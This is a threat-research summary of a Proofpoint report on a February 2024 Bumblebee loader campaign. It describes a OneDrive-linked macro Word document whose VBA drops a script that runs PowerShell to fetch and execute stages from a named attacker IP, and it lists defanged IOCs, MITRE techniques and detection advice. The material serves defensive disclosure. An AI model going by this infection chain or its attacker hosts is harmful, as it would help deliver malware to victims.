Threat Research

Bumblebee Buzzes Back in Black  | Proofpoint US

Proofpoint

Proofpoint researchers observed the Bumblebee loader return on 8 February 2024 via a voicemail-themed email campaign that used OneDrive links to deliver a macro-enabled Word document which ultimately downloaded and executed a Bumblebee DLL. The campaign used VBA macros to drop and run a scripted downloader that fetched stages from 213[.]139.205.131 and connected to C2 infrastructure such as q905hr35[.]life. #Bumblebee #OneDrive

Keypoints

  • Bumblebee reappeared in threat data on 2024-02-08 after ~4 months of absence.
  • The campaign sent voicemail-themed emails from info@quarlesaa[.]com containing OneDrive links to macro-enabled Word documents (e.g., ReleaseEvans#96.docm) spoofing Humane.
  • The Word document used VBA macros to write a temporary script to %TEMP% (example: %TEMP%/radD7A21.tmp) and executed it via wscript.
  • The dropped script contained a PowerShell command that downloaded the next-stage file “update_ver” from 213[.]139.205.131; a second PowerShell stage downloaded and executed the Bumblebee DLL (w_ver.dat / w_ver.dll).
  • Observed Bumblebee configuration included Campaign ID “dcc3” and RC4 key “NEW_BLACK”.
  • IOCs published include OneDrive lure URLs, Word document SHA256 hashes, the downloader URLs on 213[.]139.205.131, Bumblebee DLL hash, the C2 domain q905hr35[.]life, and C2 IP 49.13.76[.]144:443.

MITRE Techniques

  • [T1566.002] Spearphishing Link – Use of OneDrive URLs directing recipients to a malicious Word document (‘contained OneDrive URLs.’)
  • [T1204.002] User Execution: Malicious File – VBA macros in the document created and executed a script in the Windows temporary directory using wscript (‘The document used macros to create a script in the Windows temporary directory… The macro then executed the dropped file using “wscript”.’)
  • [T1059] Command and Scripting Interpreter – PowerShell commands in the dropped temporary file were used to download and run subsequent stages including the Bumblebee DLL (‘Inside the dropped temporary file was a PowerShell command that downloads and executes the next stage…’)
  • [T1105] Ingress Tool Transfer – Files for next stages were retrieved from remote servers (e.g., the script downloaded “update_ver” from a remote server) (‘download and executes the next stage from a remote server, stored in file “update_ver”’)
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 and stage hosting used HTTP/HTTPS endpoints and an IP:port C2 (e.g., 49.13.76[.]144:443 and q905hr35[.]life) (‘Active Bumblebee C2 IP on Feb 8’)

Indicators of Compromise

  • [URL] OneDrive lure URLs – hxxps[:]//1drv[.]ms/w/s!At-ya4h-odvFe-M3JKvLzB19GQA?e=djPGy, hxxps[:]//1drv[.]ms/w/s!AuSuRB5deTxugQ-83_HzIqbBWuE1?e=9f2plW
  • [SHA256] Word document samples – 0cef17ba672793d8e32216240706cf46e3a2894d0e558906a1782405a8f4decf, 86a7da7c7ed5b915080ad5eaa0fdb810f7e91aa3e86034cbab13c59d3c581c0e (and 1 more hash)
  • [SHA256] Dropped temporary script in %TEMP% – 2bc95ede5c16f9be01d91e0d7b0231d3c75384c37bfd970d57caca1e2bbe730f
  • [URL] Downloader endpoints on attacker host – hxxp[:]//213[.]139.205.131/update_ver, hxxp[:]//213[.]139.205.131/w_ver.dat
  • [Domain/IP] C2 infrastructure – q905hr35[.]life, 49.13.76[.]144:443

The Word document lure delivered via OneDrive links used VBA macros to reconstruct a script from CustomDocumentProperties and write it to the user’s %TEMP% directory, then invoked that script with wscript. That temporary script contained a PowerShell command which fetched a file named “update_ver” from hxxp://213[.]139.205.131/update_ver; a subsequent PowerShell stage then downloaded w_ver.dat (the Bumblebee DLL) from hxxp://213[.]139.205.131/w_ver.dat and executed it, resulting in the Bumblebee loader (w_ver.dll, SHA256 c34e5d36bd3a9a6fca92e900ab015aa50bb20d2cd6c0b6e03d070efe09ee689a) being loaded and establishing C2 connections (e.g., q905hr35[.]life and 49.13.76[.]144:443).

Technical specifics observed in the campaign include the macro using CustomDocumentProperties fields (SpecialProps, SpecialProps1-3) to build the dropped script (example path %TEMP%/radD7A21.tmp), execution via “wscript”, PowerShell-based stage execution, and Bumblebee configuration markers including Campaign ID “dcc3” and RC4 key “NEW_BLACK”. The chain highlights an email -> OneDrive link -> .docm -> VBA macro -> temporary script -> PowerShell -> DLL pattern, with downloads and C2 over web protocols.

Detection and response should focus on blocking the OneDrive lure URLs and attacker-hosted endpoints, alerting on the listed SHA256s, monitoring for wscript/VBScript and unexpected PowerShell activity that performs network fetches, and tracking known Bumblebee C2 domains and IPs. Note that use of VBA macros is less common lately, so these macro-based chains may be used to evade newer heuristics and require specific rule coverage.

Read more: https://www.proofpoint.com/us/blog/threat-insight/bumblebee-buzzes-back-black